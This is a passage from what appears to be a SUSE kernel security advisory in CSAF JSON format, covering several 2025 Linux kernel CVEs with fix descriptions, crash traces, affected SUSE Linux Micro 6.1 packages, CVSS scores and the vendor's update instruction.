70.701774][ T9333] allocate_slab+0x30e/0x1390\n[ 70.702194][ T9333] ___slab_alloc+0x1049/0x33a0\n[ 70.702635][ T9333] kmem_cache_alloc_lru_noprof+0x5ce/0xb20\n[ 70.703153][ T9333] hfsplus_alloc_inode+0x5a/0xd0\n[ 70.703598][ T9333] alloc_inode+0x82/0x490\n[ 70.703984][ T9333] iget_locked+0x22e/0x1320\n[ 70.704428][ T9333] hfsplus_iget+0x5c/0xba0\n[ 70.704827][ T9333] hfsplus_btree_open+0x135/0x1dd0\n[ 70.705291][ T9333] hfsplus_fill_super+0x1132/0x2700\n[ 70.705776][ T9333] mount_bdev+0x37b/0x530\n[ 70.706171][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.706579][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.707019][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.707444][ T9333] do_new_mount+0x73e/0x1630\n[ 70.707865][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.708270][ T9333] __se_sys_mount+0x733/0x830\n[ 70.708711][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.709158][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.709630][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.710053][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.710611][ T9333]\n[ 70.710842][ T9333] CPU: 3 UID: 0 PID: 9333 Comm: repro Not tainted 6.12.0-rc6-dirty #17\n[ 70.711568][ T9333] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.712490][ T9333] =====================================================\n[ 70.713085][ T9333] Disabling lock debugging due to kernel taint\n[ 70.713618][ T9333] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.714159][ T9333] \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40351",
"url": "https://www.suse.com/security/cve/CVE-2025-40351"
},
{
"category": "external",
"summary": "SUSE Bug 1255281 for CVE-2025-40351",
"url": "https://bugzilla.suse.com/1255281"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40351"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sysfb: Do not dereference NULL pointer in plane reset\n\nThe plane state in __drm_gem_reset_shadow_plane() can be NULL. Do not\nderef that pointer, but forward NULL to the other plane-reset helpers.\nClears plane-\u003estate to NULL.\n\nv2:\n- fix typo in commit description (Javier)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40360",
"url": "https://www.suse.com/security/cve/CVE-2025-40360"
},
{
"category": "external",
"summary": "SUSE Bug 1255095 for CVE-2025-40360",
"url": "https://bugzilla.suse.com/1255095"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40360"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68168",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68168"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix uninitialized waitqueue in transaction manager\n\nThe transaction manager initialization in txInit() was not properly\ninitializing TxBlock[0].waitor waitqueue, causing a crash when\ntxEnd(0) is called on read-only filesystems.\n\nWhen a filesystem is mounted read-only, txBegin() returns tid=0 to\nindicate no transaction. However, txEnd(0) still gets called and\ntries to access TxBlock[0].waitor via tid_to_tblock(0), but this\nwaitqueue was never initialized because the initialization loop\nstarted at index 1 instead of 0.\n\nThis causes a \u0027non-static key\u0027 lockdep warning and system crash:\n INFO: trying to register non-static key in txEnd\n\nFix by ensuring all transaction blocks including TxBlock[0] have\ntheir waitqueues properly initialized during txInit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68168",
"url": "https://www.suse.com/security/cve/CVE-2025-68168"
},
{
"category": "external",
"summary": "SUSE Bug 1255100 for CVE-2025-68168",
"url": "https://bugzilla.suse.com/1255100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
